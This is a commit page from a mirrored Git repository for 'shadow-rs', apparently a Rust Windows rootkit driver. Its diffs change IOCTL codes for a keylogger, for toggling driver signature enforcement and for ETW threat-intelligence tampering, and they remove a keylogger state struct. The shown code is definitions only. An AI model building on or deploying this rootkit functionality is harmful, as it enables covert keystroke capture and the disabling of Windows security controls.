aljaz/shadow-rs
1
1
Fork 0
mirror of https://github.com/joaoviictorti/shadow-rs.git synced 2026-01-21 16:35:29 +01:00
Code Issues Packages Projects Releases Wiki Activity

feature(driver): remove loop/thread for key state reading, added VAD root offset retrieval

Browse Source 
- Removed the loop and thread for reading key states; now the client handles this, as the driver maps the address to user mode.
- Added a function to retrieve the VAD root offset.
- Refactored various parts of the code for clarity and performance.
This commit is contained in:
joaoviictorti
2024-09-27 21:02:48 -03:00
parent 4e8e38d95c
commit f71555748c
25 changed files with 694 additions and 516 deletions
Download Patch File Download Diff File Expand all files Collapse all files

3
shared/src/ioctls.rs
View File

@@ -1,5 +1,6 @@
const FILE_DEVICE_UNKNOWN: u32 = 34;
const METHOD_NEITHER: u32 = 3;
const METHOD_BUFFERED: u32 = 0;
const FILE_ANY_ACCESS: u32 = 0;
macro_rules! CTL_CODE {
@@ -29,7 +30,7 @@ pub const IOCTL_ENUMERATE_DRIVER: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x810, ME
pub const IOCTL_ENABLE_DSE: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x811, METHOD_NEITHER, FILE_ANY_ACCESS);
// Keylogger
pub const IOCTL_KEYLOGGER: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x812, METHOD_NEITHER, FILE_ANY_ACCESS);
pub const IOCTL_KEYLOGGER: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x812, METHOD_BUFFERED, FILE_ANY_ACCESS);
// ETWTI
pub const IOCTL_ETWTI: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x813, METHOD_NEITHER, FILE_ANY_ACCESS);

17
shared/src/structs/mod.rs
View File

@@ -33,17 +33,6 @@ pub struct LIST_ENTRY {
pub Blink: *mut LIST_ENTRY,
}
/// Represents the state of the keylogger system.
///
/// This struct is used to manage whether the keylogger functionality is enabled
/// or disabled. The `enable` field indicates if the keylogger is active.
#[repr(C)]
#[derive(Debug)]
pub struct Keylogger {
/// A boolean value indicating if the keylogger is enabled (`true`) or disabled (`false`).
pub enable: bool,
}
/// Represents the state of ETWTI (Event Tracing for Windows Thread Information).
///
/// This struct manages whether ETWTI is enabled or disabled for capturing thread
@@ -85,9 +74,7 @@ pub struct TargetInjection {
/// Represents information about a network or communication port.
///
/// This struct holds information about a specific port, including the protocol used,
/// the type of port, its number, and whether the port is enabled or disabled.
/// It is marked as `#[repr(C)]` for compatibility with C-style layouts, making it suitable for
/// FFI (Foreign Function Interface) and low-level systems programming.
/// the type of port, its number, and whether the port is enabled or disabled.
#[repr(C)]
#[derive(Debug, Clone, Copy, PartialEq)]
pub struct PortInfo {
@@ -95,7 +82,7 @@ pub struct PortInfo {
/// This field is represented by the `Protocol` enum.
pub protocol: Protocol,
/// The type of port (e.g., open, filtered).
/// The type of port (e.g., local, remote).
/// This field is represented by the `PortType` enum.
pub port_type: PortType,